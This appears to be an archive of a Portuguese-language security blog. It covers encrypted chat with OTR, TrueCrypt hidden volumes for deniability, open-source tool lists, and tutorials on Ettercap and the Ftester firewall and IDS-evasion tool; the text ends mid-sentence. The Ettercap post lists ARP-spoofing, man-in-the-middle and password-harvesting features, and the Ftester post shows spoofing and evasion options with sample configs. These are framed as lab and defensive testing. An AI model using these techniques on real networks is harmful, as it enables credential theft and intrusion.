I-Secure

Curso do Metasploit Framework

2009-09-21T18:07:00.005-03:00

O pessoal do "Offensive Security" lançou hoje um curso online para quem quer aprender a usar o framework de pentest (Teste de penetração) Metasploit.

Vale salientar que ele é de GRAÇA

Segue o link: http://www.offensive-security.com/metasploit-unleashed/

Se você gostarem, não se esqueçam de doar para o HFC (Hackers for Charity), são apenas 4 dólares e farão a diferença para alguém. E é um valor muito baixo para o tipo de conhecimento que se adquire com um curso desse.

Espero que gostem e usem com sabedoria.

Abraços

Comunicações seguras.

2009-09-11T05:30:00.002-03:00

Com o aumento da importância de comunicações multidestinatárias é desejável que as trocas de informações entre membros de um grupo ocorram em um ambiente seguro, onde há garantia da privacidade, autenticidade e integridade das informações transmitidas.

Os senhores podem não saber mas as comunicações que utilizamos no nosso dia a dia não são nada seguras. Um simples sniffer (wireshark) na rede pode captar todo o conteúdo de e-mails, mensagens instantâneas (MSN, ICQ, IRC e etc) e até gravar o conteúdo de conversas sobre VoIP. http://wiki.wireshark.org/VoIP_calls

Para que nós possamos prevenir que nossos dados sejam expostos há uma série de procedimentos que podem (e devem) ser tomados para garantir a segurança nas suas comunicações.

Neste artigo vou abordar a criação de uma forma segura e simples de se comunicar utilizando o Ubuntu, o cliente de mensagens Pidgin.

Para mantermos a comunicação entre diversos protocolos de mensagens instantâneas, utilizaremos um plugin do Pidgin chamado OTR (Off the record Messaging ou Messagens sem registro).

Para saber como Instalar, configurar e usar o pidgin dê uma olhada neste outro post.

Após estar familiarizado com o Pidgin, basta ir em: http://www.cypherpunks.ca/otr/index.php#downloads

Baixe a versão do seu sistema operacional e instale.
Lembre-se que após instalar a versão com o plugin você tem que reiniciar o pidgin para que o plugin funcione.

Uma vez baixado, ele irá constar como “plugin” no Pidgin. Basta clicar no menu Ferramentas --> Plugins e selecionar a opção “Configurar plugin”. Ali é possível gerar as chaves criptográficas que serão usadas para “criptografar” as conversas.

Depois, basta iniciar uma conversa com outra pessoa que também tenha o OTR e iniciar a sessão de conversa (private). O OTR exigirá que você “autentique” a outra pessoa. Isso serve para certificar que a pessoa com quem você está falando é mesmo quem ela diz ser.

Na versão atual do OTR, a 3.2.0, é possível fazer a autenticação de três maneiras: pergunta com resposta secreta, segredo compartilhado e autenticação manual. A primeira, como o próprio nome sugere, funciona com uma pergunta que a outra pessoa terá de responder. O “segredo compartilhado” é apenas uma frase ou combinação qualquer que os dois participantes da conversa precisam saber com antecedência. É claro que o referido “segredo” precisa ser compartilhado por um meio seguro (pessoalmente, por exemplo).

A autenticação manual ambos dizem que confiam na chave do outro. A chave pode ser identificada por meio da digital (“fingerprint”). A chave não deverá mudar desde que o computador usado para a comunicação seja o mesmo. Caso o mesmo usuário esteja com outra chave, seria sinal de um impostor.

Assim, além de garantir a segurança da comunicação, o OTR também garante que a pessoa com quem você está falando não teve sua a senha roubada. A vantagem dos outros métodos de autenticação (resposta secreta e segredo compartilhado) é que haverá uma verificação em cada conversa, garantindo que mesmo alguém usando o mesmo computador não consiga se passar pela pessoa com quem você gostaria de falar.

Vale lembrar também que você pode aumentar sua segurança criando um servidor de mensagens XMPP no qual ele fará o manuseio das suas sessões e mensagens. Um ótimo XMPP server é o Openfire. Vale a pena conferir, pois ele substitui os Mensageiros Instantâneos em várias empresas e governos.

Usando o Pidgin para conectar na rede Jabber

2009-09-11T04:35:00.001-03:00

Confira nestes slides de como Instalar, configurar e usar o Pidgin.

Eu recomendo por ser uma ótima ferramenta que funciona tanto no linux como no windows e tem várias implementações no quesito segurança.

Usando o Pidgin para conectar na rede Jabber

View more presentations from bardo.

Criptografia de arquivos - Parte 2 - Prática

2009-09-05T00:14:00.003-03:00

Na continuação do artigo Criptografia de arquivos - Parte 1 - Teoria vamos criar um drive / volume escondido de dupla face (Hidden Volume) utilizando o Truecrypt no Ubuntu linux.

Mãos à obra.

Após instalado o Truecrypt, vá no menu:

Aplicativos -> Outros -> Truecrypt

A tela abaixo deve aparecer.

Clique no botão "Create Volume" para começar a criação do seu drive.

Aparecerá na sua tela o Assistente de criação de volume:
Selecione "Create an encrypted file container"

Selecione a opção "Hidden Truecrypt volume"

Escolha o nome e o lugar onde o arquivo criptografado contendo o seu drive irá ficar.

Selecione o algoritmo de criptografia que será usado. Conforme escrevi no artigo anterior estarei usado o algoritmo AES Rijandel e para geração da chave criptográfica (hash) utilizarei o RIPEMD-160 por se tratar de um algortimo que gera chaves fortes.

Selecione o tamanho que você deseja que o seu drive possua. É bom ficar atento ao fato de que é necessário um tamanho maior do que os arquivos sensíveis do volume escondido, ou seja, é necessário calcular aproximadamente qual tamanho dos arquivos que você irá utilizar de isca + arquivos sensíveis.

Seleciona uma senha para o volume "de fora" (isca). Podemos também utilizar um arquivo de chave (qualquer arquivo serve) para podermos acessar os dados criptografados. Para uma maior segurança é recomendado a utilização de uma chave juntamente com uma senha.

Agora chegou a hora do programa criar a chave de criptografia para o seu volume externo.
Mexa o mouse aleatoriamente para aumentar a segurança da chave, quanto mais tempo e mais vezes você mexer o mouse, mais forte a chave ficará.

Pronto, agora o seu volume externo está pronto para ser usado. Clique em "Open Outer Volume" para abrir o seu drive isca e colocar os arquivos isca nele. Note que estes arquivos irão consumir espaço no seu drive criptografado.

Após colocarmos os arquivos isca, vamos à criação do drive escondido.

Após colocar os arquivos isca voltaremos à tela do Truecrypt para a criação do "Hidden Volume"

Novamente escolha os algoritmos de encriptação.

Selecione o tamanho do drive interno (escondido).
Quanto maior o tamanho do drive escondido menos espaço você terá para os arquivos isca, e vice-versa.

Escolha a sua senha e/ou arquivo chave.

Selecione o tipo de partição que este drive irá usar.
Para uma maior interoperabilidade entre os sistemas, utilizarei FAT, mas esta escolha fica a cargo da necessidade de cada um.

Novamente mova o mouse para criar uma chave forte de criptografia.

Pronto, seu volume agora foi criado e está pronto para ser usado.

Agora basta abrir o arquivo no Truecrypt com ambas as senhas e verificar as diferenças.
Selecione o slot que você quer que o truecrypt use para montar o seu drive.
Clique me "Select file..." e logo em seguida "Mount".

Digite a senha do volume externo (o drive isca).

E os arquivos isca irão aparecer.

Agora vamos desmontar o drive para que possamos conferir o conteúdo do drive escondido.

Selecione novamente o arquivo:

E coloque a senha do drive/volume escondido:

E pronto, agora podemos acessar nossos arquivos seguramente.

Há várias outras formas de se combinar as opções desse programa. Basta testar e ver quais atende melhor às suas necessidades.

Espero que este tutorial possa ajudar.

Abraços

Criptografia de arquivos - Parte 1 - Teoria

2009-09-04T03:51:00.003-03:00

Resumo

Para quem não está familiarizado com os conceitos de criptografia, algoritmos e chaves aconselho ler o seguintes artigo:
http://informatica.hsw.uol.com.br/criptografia.htm

O estudo da criptografia cobre bem mais do que apenas cifragem e deciframento de dados. É um ramo especializado da teoria da informação com muitas contribuições feitas a partir de outros campos da matemática e do conhecimento humano, incluindo autores como Maquiavel, Sun Tzu e Karl von Clausewitz. A criptografia moderna é basicamente formada pelo estudo dos algoritmos criptográficos que podem ser implementados em computadores.

Aplicações

As aplicações de criptografia no dia a dia são bem mais comuns do que se pode imaginar. Por exemplo, quando você acessa o seu “MSN” a sua senha (e somente ela) passa por uma conexão criptografada ou quando você acessa qualquer serviço dos grandes provedores de conteúdo e ferramentas (google, yahoo, microsoft, facebook e etc...) você está fazendo uso de criptografia.

Mas isto é apenas um pequena parte da implementação possível com esta tecnologia.

É importante proteger os seus dados, informações e privacidade assim como pesquisas e documentos de grande importância e com alguns softwares, pouco tempo e de uma forma bem simples podemos melhorar consideravelmente o nossa segurança.

Neste artigo vou focar apenas na criação de Drive Criptografado de dulpa face no Ubuntu linux.

Por que você quer criar um drive criptografado? Provavelmente é porque você tem algum arquivo de segurança sensível que você não quer que outras pessoas tenham acesso. Um disco criptografado fornece um lugar seguro para colocar esses tipos de arquivos para que as pessoas não possam ver ou acessá-los sem uma senha.

Por que você quer criar um drive oculto? Há 2 razões principais. O primeiro é porque você tem arquivos sensíveis como mencionado acima. Talvez você não queira que as pessoas saibam que eles existem.

A segunda razão é mais grave. Recentemente, vários governos têm implementado leis onde você pode ser forçado a fornecer as chaves de criptografia para oficiais do governo (por exemplo, nos aeroportos) para que eles possam decodificar seus arquivos. Pode ser considerado um crime não para fornecer ou falar que você esqueceu essas chaves/senhas.

Agora imagine se você pudesse entregar uma chave que eles podem usar, descriptografar alguns arquivos que não você não se preocupa que sejam expostos e ainda assim eles não têm acesso a seus arquivos confidenciais. Imagine se eles nunca poderem provar que você estava escondendo nenhum documento adicional e que poderia, portanto, mostrar que tem sido completamente obediente às leis e ainda assim manter seus arquivos seguros. Isto é agora possível!

AVISO: Eu não violo as leis e também não encorajo ninguém a quebrar/violar as leis. Se você não puder entregar uma chave de encriptação quando estiver obrigado legalmente a fazê-lo, você pode estar quebrando a lei. Não faça isso.

O programa.

Como funciona ?

Primeiro um drive container criptografado é criado. Alguns arquivos não secretos são colocados nesta unidade. O espaço restante deste drive é formado por dados aleatórios. Então, dentro desses dados aleatórios, uma segunda unidade escondida é criada. Esta unidade só pode ser acessada com uma outra chave de encriptação diferente da usada para criar o primeiro container. Sem essa chave deve ser matematicamente impossível identificar se os dados aleatórios são de fato dados aleatórios ou uma segunda unidade criptografada escondida. Esta segunda unidade poderia ser apenas o espaço livre dentro da primeira unidade.

Quando forçados sob coerção para fornecer uma chave de encriptação, você fornece a primeira. Eles podem descriptografar o disco do primeiro container. Eles então terão acesso aos seus arquivos não secretos e/ou não sensíveis (chamados de arquivos Isca) . Eles não tem como saber se há alguma coisa no espaço restante e você obedeceu a lei entregando uma chave de decodificação criptografica. Dados os arquivos isca que você utilizou no primeiro container quem quer que tenha conseguido a chave vai ficar bastante ocupado tentando descobrir o porque você criptografou os seus arquivos ou então ficar frustrado por não ter achado nada que valesse a pena.

Existem muitas pesquisas no campo da criptografia assim como vários algoritmos de criptografia. Sendo que muitos deles já são facilmente quebrados por computadores domésticos comuns.

A grande maioria dos profissionais de criptografia e pesquisadores do assunto mostram que o algoritmo AES – Rijndael é um dos melhores, se não o melhor que existe hoje. Tendo isso em mente utilizarei um programa open-source para a criptografar meus arquivos utilizando não somente este algoritmo, mas também outros.

TrueCrypt é um software de criptografia de código aberto que permite que você mantenha seus dados e arquivos seguros e prevenir o acesso não autorizado.

O TrueCrypt é fácil de usar, usa algoritmos de criptografia muito bons, e também é compatível com Windows e Mac e para aquelas pessoas que compartilham dispositivos externos com windows / mac também.

==--==

Na parte 2 deste artigo iremos abordar a parte prática.

Segurança e Liberdade.

2009-04-23T04:12:00.008-03:00

Como é bastante divulgado na mídia, pessoas com interesses escusos, principalmente governos e grandes corporações estão de olho em nossos dados. Paranóia? Experimentem usar redes P2P e um IDS/IPS na sua rede para você ver a origem das conexões que estarão tentando obter informações da sua máquina/rede. Um ótimo artigo de como instalar um IDS está aqui

Vale lembrar também alguns casos em que governos e/ou corporações (não acredito que sejam os hackers malvados) tentaram e conseguiram alguns dados.

Ataque man-in-the-middle que ajudou a resgatar a Ingrid Betancourt das FARC

Daniel Dantas 10 X Polícia Federal 0 (criptografia)

Hackers Chineses fazem a festa

Entre vários outros episódios que deixaria este post longo demais.

Pretendo começar uma série de artigos de como tornar mais difícil o trabalho para os xeretas de plantão.

Pretendo cobrir nestes artigos:

Criptografia de disco e arquivos.
Comunicações seguras.
Redes criptografadas
Redes Anônimas

TRUSTED COMPUTING (computação confiável)

2007-12-03T11:50:00.000-02:00

Vídeo sobre computação confiável.

Montando uma infra-estrutura de serviços de uma empresa usando software livre.

2007-10-09T15:45:00.000-03:00

Caros senhores,

Um dia fazendo um projeto de infra-estrutura de uma empresa com Softwares OpenSource e com alguns proprietários me perguntei: Será que existem ferramentas OpenSource para montar toda uma infra-estrutura de serviços usando software livre para um pequena, média ou grande empresa?

Após algumas horas de pesquisa, eis que surgem os resultados.

Segue abaixo uma lista de ferramentas para atender à quase todas as demandas de uma empresa.

Controlador de domínio:
http://us4.samba.org/samba/

DNS:
http://www.bind.org

Servidor de impressão (Print Server):
http://us4.samba.org/samba/

Servidor de Arquivos (File Server):
http://us4.samba.org/samba/

Firewall - VPN - Roteador:
http://www.ipcop.org/

http://www.efw.it/

Servidores WEB:
http://www.apache.org/

http://tomcat.apache.org/

http://www.lighttpd.net/

Portal corporativo (intranet - internet)
http://www.metadot.com/

http://www.jboss.com/products/jbossportal

Helpdesk (trouble ticket)
http://helpcenterlive.com/dru/faq#n14

http://osticket.com/index.php

http://www.ilient.com/free-help-desk-software.htm

Suíte de colaboração (web-mail + calendar + Contatos)
http://www.zimbra.com/community/downloads.html

http://www.egroupware.org/

Loja Virtual (e-commerce)
http://www.zen-cart.com/

http://www.oscommerce.com/

Gerenciamento de Projetos (Project Management)
http://www.sigma-six.org/

http://projectbench.sourceforge.net/

ERP (Enterprise Resource Planning )
http://www.tinyerp.com/

http://freerp.org/

Gestão de recursos humanos - HR(Human Resource) Management
http://www.orangehrm.com/home/

http://www.openhris.com/

Gerenciamento de redes (Network Management)
http://network-management-center.com/index.asp

Software de inventário (Asset Management)
http://www.ilient.com/free-help-desk-software.htm

http://asset-tracker.sourceforge.net/

Espero que as informações ajudem.

Abraços

Mário M. Magalhães

Ferramentas de Rede

2007-08-27T10:33:00.000-03:00

Caros leitores,

Segue abaixo uma listagem de softwares para gerênciamento de redes. A listagem foi retirada de: http://www.ucb.br/prg/professores/maurot/soft_redes.htm

Espero que ajude.

Wireless
Wireless LAN Resources Info sobre wireless LAN's no linux
Bluez Pilha Linux bluetooth

Gerência de Redes e Serviços
Projeto Net SNMP (UCD) Pacote Linux SNMP
CACIC Sistema de controle de inventário em rede em SL
OpenNMS Implementação de um sistema de gerenciamento free
Nagios Sistema de monitoramento para Linux (antigo Netsaint)
Zabbix NMS - Sistema de monitoramento
jffnms NMS - Sistema de monitoramento
Zenoss NMS - Sistema de monitoramento
OpenQRM Sistema de monitoramento de servidores e aplicações (datacenter)
Groundwork Sistema de monitoramento de TI
NetDirector Gerenciamento de servidores e serviços
Hyperic Sistema de monitoramento de servidores e aplicações (datacenter)
OCS Inventory NG Sistema de inventário e distribuição de atualizações de software
GLPI Sistema de inventário livre
Pandora Sistema de monitoramento
Nedi Sistema de monitoramento
Splunk Sistema de monitoramento e análise de eventos e logs de TI
Webmin Administração WEB de sistemas TI
Mon Software para monitoramento de serviços e disparo de alarmes
Nedi Ferramenta para monitoramento de rede
Pandora Ferramenta para monitoramento de rede
NTop Ferramenta para analisar utilizaçao de rede
NMIS Sistema de gerenciamento de rede
MRTG Sistema de gerenciamento de tráfego em links de dados.
BandwidthD Sistema que gera gráficos HTML de uso de banda
NAV Network Administration Visualized
RRDTool Software para análise gráfica de dados (como no MRTG)
Cisco Centric Open Source Software livre para gerenciamento de equipamentos Cisco
Decodificador ASN.1 Decodificador simples para ASN.1/BER

VoIP, VCF e Multimídia sobre Redes
Asterisk.org Implementação de PABX em SW livre e suporte a vários protocolos de VoIP. Veja também sua documentação.
AsteriskBrasil Comunidade nacional do PABX Asterisk
Astlinux Distribuição Linux pronta com o Asterisk e SER
Open MGCP Implementação livre MGCP
SER SIP Express Router (licença GPL)
OpenSER Router SIP
SIP Foundry PABX SIP
VOCAL Vários softwares para VoIP
Ekiga Implementação de cliente H.323 (antigo Netmeeting)
Voxgratia Vários projetos em SL VoIP
GNUGK Implementação GNU de um gatekeeper
vlc Video LAN cliente multimídia e servidor streaming
LS3 Plataforma aberta para streaming multimedia
Flumotion Servidor streaming Fluendo

Terminais e VPN's
hamachi VPN fácil sobre a Internet
RDesktop Implementação do protocolo RDP para acesso remoto a servidores Windows via terminal service
Linux Terminal Server Project Linux como servidor de estações diskless ou thinclients
Open VPN Implementação VPN lIvre
Amrita VPN Implementação de VPN
RealVNC Virtual Network Computing - software free para terminal virtual
UltraVNC Controle remoto através de rede TCP/IP
puTTY Software free para terminais e SSH

Automatização
Avahi Implementação Zeroconf para Linux

Roteamento
Quagga Implementação de protocolos de roteamento
Mobile IPv6 for Linux Implementação de suporte a mobilidade IPv6 no Linux
Vyatta Implementação de roteador, firewall e VPN livre

Protocolo LDAP
OpenLDAP Implementação GPL do protocolo LDAP

Análisadores de Tráfego
tcpdump Site do utilitário de análise de tráfego
Wireshark Um bom analisador GPL. Antigo Ethereal.
Ettercap Sniffer de conexões
kismet Analisador wireless GPL
Sniff-em Bom Sniffer - versão free captura somente tráfego entrante
Analyzer Analisador de protocolos free
Wildpackets Softwares úteis para análise de redes

Correio Eletrônico
PostFix Mailer
Squirrel Mail WEB mail

Ferramentas para Testes e Benchmarks em Rede
NetPIPE Ferramenta de teste de rede independente de protocolo
NetPERF Benchmarking de rede no Linux

Clusters
OpenMOSIX Implementação MOSIX free
Arcademis Plataforma em JAVA para desenvolvimento de middleware orientado a objetos
Clustermatic Implementação de cluster de alta performance
Beowulf.org Site oficial do Beowulf
Linux Virtual Server Project Servidor virtual Linux sobre clusters
Linux Compute Clusters Informações sobre clusters Linux
Linux Clusters Info Center Informação sobre Clusters Linux
DRBD Espelhamento de dispositivos de blocos remotos
Mission-Critical Linux Projeto de extensões do kernel para serviços de missão crítica
Linux HA Project Projeto de clusters HA sobre Linux
Multipinguim Site brasileiro sobre clusters
Ultramonkey Implementações HA e Load Balance sobre Linux
OSCAR Ferramentas free para cluster beowulf
RockClusters Distribuição Linux voltada para clusters
MSCLinux Distribuição adequada a clusters
Clubmask Ferramentas para gerenciamento e agendamento de clusters

Grid's
Globus Tecnologias de grids computacionais
Legion Implementação de grid
Condor Gerenciamento de carga de trabalho para computação em grid
OurGrid Implementação nacional de grid

Segurança
Snort IDS em código aberto
GuardDog Configurador de firewall (iptables)
M0n0wall Firewall baseado em freeBSD que pode rodar a partir do CD, guardando as configurações em diskette
Astaro Firewall para Linux grátis
Prelude IDS híbrido para Linux
Nessus Sistema de teste da segurança para Linux
Osiris Verificador de integridade de arquivos e serviços no sistema- IDS
OpenSSH Implementaçao free do SSH
Firewall Builder Interface GUI para vários firewalls

QoS sobre Redes
altQ Implementação de enfileiramento alternativo

Simuladores de Rede
ns Network Simulator
BlueHoc Simulador Bluetooth
NIST.net Network emulator
cnet Simulador de protocolos de rede

Abraços a todos.

Mário M. Magalhães

Usando o ettercap

2007-03-28T11:20:00.000-03:00

O seguinte artigo é uma pequena introdução ao Ettercap, programa o qual é descrito pelo seu autor como "Um sniffer multi-propósito / Interceptor / Logger para LANs com switches"
O ettercap faz uso pesado de ARP Spoofing, e se você não está familiarizado com este conceito, talvez você queira saber um pouco mais sobre ele antes de começar ( http://en.wikipedia.org/wiki/Spoofing_attack ).

IMPORTANTE: Arp spoofing pode (e causa) grandes danos na sua rede. O ideal seria testa-lo em um ambiente separado da sua LAN de produção.

Você pode baixar o ettercap em: http://ettercap.sourceforge.net/download.php
EtterCap é um sniffer multi-propósito / Interceptor / Logger para LANs com switches.

Ele suporta dissecação ativa e passiva de protocolos (até os cifrados/encapsulados) e inclui várias várias funcionalidades para análise de rede e de hosts. Entre as funcionalidades estão:

Injeção de caracteres em conexões estabelecidas: Você pode injetar caracteres para o servidor (emulando comandos) ou para o cliente (emulando respostas) mantendo as conexões "alive"!

Suporte ao SSH1: Você pode sniffar Usuário e senha, mesmo através de uma conexão criptografada SSH1.

Suporte à HTTPS: Você pode sniffar dados http SSL, até mesmo se a conexão for feita por um PROXY.

Tráfego remoto através de GRE tunnel: Você pode sniffar tráfego remoto passando através de um tunel GRE de um roteador Cisco remoto e fazer um ataque mitm (man in the middle) no roteador.

PPTP broker: Você pode fazer ataques mitm contra dados tunalados por PPTP.

Coletor de password para: TELNET, FTP, POP, RLOGIN, SSH1, ICQ, SMB, MySQL, HTTP, NNTP, X11, NAPSTER, IRC, RIP, BGP, SOCKS 5, IMAP 4, VNC, LDAP, NFS, SNMP, HALF LIFE, QUAKE 3, MSN, YMSG.

Filtro de pacotes / dropador de pacotes: Você pode configurar um filtro de pacotes para procurar uma string em particular (até mesmo hex) no conteúdo dos pacotes TCP e UDP e substituir uma string por uma especificada por você ou simplesmente dropar o pacote todo.

Identificação de Sistema Operacional: Você pode fazer o fingerprint do SO do host vítima ou até mesmo da sua interface de rede.

Terminar uma conexão: A partir de uma lista de conexões, você pode terminal qualquer conexão que você queira.

Scanner passivo da LAN: Você pode conseguir informações sobre: os hosts que estão na LAN, porta abertas, versão de serviços, tipo de host (gateway, roteador ou um host simples) e a distância estimada em hops (saltos).

Checagem de outros atacantes: o ettercap tem a habilidade de, ativa ou passivamente, achar outros atacantes na LAN.

Vou examinar apenas algumas funcionalidades do ettercap, o resto é da sua imaginação.
O laboratório que eu montei tem a seguinte configuração:

o IP 192.168.0.1 é o Gateway padrão. Estarei usando um Cisco Catalyst 2900XL Switch (Ambiente com Switch).

Segue um vídeo de um ataque teste de DNS spoofing:

http://www.milw0rm.com/video/watch.php?id=43

Se você ouviu falar alguma solução de sobre troca de porta (port security), eu não tive a oportunidade de testar isso =/. Mas enfim, ficarei grato em saber sua sua experiência. Ahhhh, no vídeo estou usando uma versão para windows, mas gostaria de lembrar que a versão ettercap para o linux tem muito mais funcionalidades e plugins, mas para gravar o vídeo e mecher com GUI preferi o windows.

Bem, é isso.

Abraço a todos.

Mário Miranda de Magalhães

A "must know" of Security

2007-03-01T09:27:00.000-03:00

Hi to all,

I know that most of people that get access here have a high level of technical knowledge. But some people just don't know what is what in security terms or sometimes don't know that technology.
So, today i'll post links that I consider a "MUST KNOW" for those who lives with (un)security.

Note that it's only concepts of these technologies does.

Let's get started.

Firewall concept and implementation

Honeypots

Intrusion Detection System (IDS)

Network intrusion detection system (NIDS)

Host-based intrusion detection system (HIDS)

Protocol-based intrusion detection system (PIDS)

IDS evasion techniques

Application protocol-based intrusion detection system (APIDS)

Anomaly-based intrusion detection system

Intrusion prevention system (IPS)

Artificial immune system

Autonomous Agents for Intrusion Detection

Cisco Security Agent

Rootkit

Sniffer

Spoof Attacks

This is what I remeber now. I'll post more soon.

Hope I helped.

[]'s

Mário Miranda de Magalhães

Were my visits came from...

2007-02-26T09:29:00.000-03:00

Aqui está um mapa de onde provém as visitas do meu blog.

Here's a map of where my blog's visits came from.

[]'s to all

Abraços a todos

Mário Miranda

Ftester - Firewall and IDS evasion testing

2007-02-24T11:48:00.000-02:00

As I've already done an approach to this tool in last post in portuguese, now it comes in english. And it's better than the portuguese version because i've tested this tool and learn some stuff. And I grab some text of the autor. (in fact of that, this is a mixed tutorial, 80 percent author and 20 percent).

Hope You enjoy.

FTester - Introduction and Tutorial v1.0

The Firewall Tester (ftester for friends), is a tool designed for testing
firewalls filtering policies, from version 0.6 it also includes an Intrusion
Detection System (IDS) testing feature. Basically ftester is made of a packet
generator tool (ftest) and a sniffer (ftestd), the first script injects custom
packets with a signature in the data part while the sniffer listens for such
marked packets, the comparison of the sniffer logs with the injector ones
permits the identification of firewall filtering rules. Unlike common firewall
testing tools or packet generators ftester is capable of generating network
traffic that will looks like real connections to the firewall or IDS system
tested, this feature allows us to test stateful inspection firewalls (like
netfilter or ipfilter) and IDS (like snort). Another advantage of this
architecture is that we can spoof crafted packets source address since the
sniffer knows which packets are generated by it's counterpart, some tricks
involving TTL permits the spoofing also when simulating real connections, this
is described as the 'connection spoofing mode'.

The ftester components are perl scripts so they can be executed on any platform
with a recent version of perl (at least 5.6.1 is recommended) and the three perl
modules Net::RawIP, Net::PcapUtils, NetPacket, they can be downloaded at
www.cpan.org or using the CPAN shell.

Installation is quite simple, just untar the archive ftester-X.X.tar.gz and
everything we need will be decompressed in the ftester-X.X directory, here
we'll find:

- ftest (the client-side packet generator)
- ftestd (the sniffer)
- ftest.conf (ftest example configuration file)
- freport (a script for comparing ftest and ftestd log files)

the rest is documentation (I recommend reading the man page ftester.8).

The invocation of ftest and ftestd without options will show an usage summary,
look at the documentation for a detailed explanation regarding these options and
the configuration file.

# ./ftest

Firewall Tester client v1.0
Copyright (C) 2001-2006 Andrea Barisani [andrea@inversepath.com]

Configuration options:
-f [conf_file]
-c [source_ip]:[source_port]:[dest_ip]:[dest_port]:[flags]:[protocol]:[tos]
-v [verbose]

Timing options:
-d [delay, 0.25 = 250 ms]
-s [sleep time, 1 = 1 s]

Evasion options:
-e [evasion method]
-t [ids_ttl]

Connection options:
-r [reset connection]
-F [end connection]
-g [IP fragments number, es. 4|IP fragments size, es. 16b]
-p [TCP segments number, es. 4|TCP segments size, es 6b]
-k [cksum value, es. 60000]
-m [marker]

# ./ftestd

Firewall Tester sniffer v1.0
Copyright (C) 2001-2006 Andrea Barisani [andrea@inversepath.com]

Configuration options:
-i [interface]
-g [fragments reassembly]
-m [marker]
-v [verbose]

Connection options:
-c [ttl1:ttl2] (ttl1 setting currently works only on Linux systems)

The definition of the packets we want to send for test if they can traverse the
firewall is mainly specified in a configuration file (usually ftest.conf), the
main syntax is:

Source Address:Source Port:Destination Address:Destination Port:Flags:Protocol:Type of Service

for TCP and UDP packets

Source Address:Source Port:Destination Address:Destination Port:Flags:ICMP:icmp_type:icmp_code

for ICMP packets

here's are a few examples:

# SYN packet to 10.1.7.1 port 80
192.168.0.10:1024:10.1.7.1:80:S:TCP:0

# PSH,ACK reply from 192.168.0.10
192.168.0.10:20:10.1.7.1:1022:AP:TCP:22

# UDP packet
192.168.0.10:53:10.1.7.1:53::UDP:0

# ICMP packet type 3 code 5
192.168.0.10::10.1.7.1:::ICMP:3:5

# ranges are allowed for source address, source port, destination port
# source address can also be specified in CIDR form
192.168.0.1-255:1024:10.1.7.1:22:S:TCP:0
192.168.0.1:1024:10.1.7.1:1-65535:S:TCP:0
192.168.0.1:1-1024:10.7.0.1:20-25:S:TCP:22
192.168.3.0/24:1-1024:10.7.0.1:20-25:S:TCP:0
192.168.0.0/22:1024:10.7.0.1:80:S:TCP:0

A stop signal is necessary for telling ftestd that our test is completed, this
can be accomplished with the following syntax:

stop_signal=192.168.0.1:666:10.1.7.1:666:S:TCP:

the stop_signal can be a TCP, UDP or ICMP packet, this packet will cause the
termination of the sniffer so every packet specified after the stop_signal
directive wont be seen by ftestd.

Let's first see it's basic usage in testing basic non-stateful firewall
filtering policies. We'll use the ftest script on a machine placed outside the
firewall and ftestd on a machine placed inside the firewall on the DMZ we want
to test (of course if we want to test outbound filtering we can reverse ftest
and ftestd placement).


-----------                             ------------
| Host A  |----------[firewall]---------| Host B   |
| (ftest) |                             | (ftestd) |
-----------                             ------------

Host A IP Address: 192.168.0.10
Host A IP Address: 10.1.7.1

Step 1:

For testing which privileged services can be reached from the outside we'll use
the following simple configuration file:

- ftest.conf -
# checking privileged ports ([1025)
192.168.0.10:1025:10.1.7.1:1-1025:S:TCP:0
# checking proxy port
192.168.0.10:1025:10.1.7.1:3128:S:TCP:0
stop_signal=192.168.0.10:80:10.1.7.1:1025:AP:TCP:0

of course we must be sure that the stop signal will reach ftestd, in this case
we've verified that the firewalled host can surf the web so a reply from port 80
should be fine.

Step 2:

Let's start as root ftestd on Host B:

[root@hostb]# ./ftestd -i eth0 -v

Let's injects the packets as root on Host A:

[root@hosta]# ./ftest -f ftest.conf -v -d 0.01

We see an output displaying every packet sent and the ftest.log file is
created.


- ftest.log -
# ftest started on Tue Jun  4 22:37:11 CEST 2002
1 - 192.168.0.10:1025 > 10.1.7.1:1 S TCP 0
2 - 192.168.0.10:1025 > 10.1.7.1:2 S TCP 0
3 - 192.168.0.10:1025 > 10.1.7.1:3 S TCP 0
...
... (cutted for the sake of brevity)
...
1023 - 192.168.0.10:1025 > 10.1.7.1:1023 S TCP 0
1024 - 192.168.0.10:1025 > 10.1.7.1:1024 S TCP 0
1025 - 192.168.0.10:1025 > 10.1.7.1:1025 S TCP 0
1026 - 192.168.0.10:1025 > 10.1.7.1:3128 S TCP 0
1027 - 192.168.0.10:80 > 10.1.7.1:1025 PA TCP 
# ftest stopped on Tue Jun  4 22:38:42 CEST 2002

On Host B ftestd shows the same messages and creates the ftestd.log file.

As we can see each packet is marked with an unique identifier (the first number
of the line) which corresponds to the packet IP ID field, this will help us for
comparing the different log files.

Step 3:

Finally we copy the two log files on the same host and we compare them using
freport:

[root@hostb]# ./freport ftest.log ftestd.log


Authorized packets:
-------------------

21 - 192.168.0.10:1025 > 10.1.7.1:21 S TCP 0
22 - 192.168.0.10:1025 > 10.1.7.1:22 S TCP 0
23 - 192.168.0.10:1025 > 10.1.7.1:23 S TCP 0
25 - 192.168.0.10:1025 > 10.1.7.1:25 S TCP 0
80 - 192.168.0.10:1025 > 10.1.7.1:80 S TCP 0
110 - 192.168.0.10:1025 > 10.1.7.1:110 S TCP 0
113 - 192.168.0.10:1025 > 10.1.7.1:113 S TCP 0
1027 - 192.168.0.10:80 > 10.1.7.1:1025 PA TCP 0

Modified packets (probably NAT):
--------------------------------

443 - 192.168.0.10:1025 > 10.1.7.1:443 S TCP 0
  >>>>>>>>
443 - 192.168.0.10:1025 > 10.1.7.5:443 S TCP 0

Filtered or dropped packets:
----------------------------

1 - 192.168.0.10:1025 > 10.1.7.1:1 S TCP 0
2 - 192.168.0.10:1025 > 10.1.7.1:2 S TCP 0
3 - 192.168.0.10:1025 > 10.1.7.1:3 S TCP 0
...
... (cutted for the sake of brevity)
...
1026 - 192.168.0.10:1025 > 10.1.7.1:3128 S TCP 0

As we can see ftp,telnet,ssh,smtp,http,pop3,auth are apparently reachable from
the outside, https is forwarded to host 10.1.7.5 and the rest, including the
proxy port is filtered, of course NAT regarding the destination address can be
detected only if we sniff on a non-switched environment otherwise only port
address translation or source address translation can be detected.

The sniffing of packet 1027 (the PSH,ACK from port 80) demonstrate that we are
dealing with a simple firewall that does not perform connection tracking,
however as of today stateful inspection firewalls are more likely to be found in
real environments. Stateful inspection firewalls usually performs connection
tracking and they are not suppose to pass unmatched packets that aren't part of
a previously initiated connection, for this reason if we need to test the
filtering policies regarding PSH,ACK and moreover URG,RST,FIN packets we have to
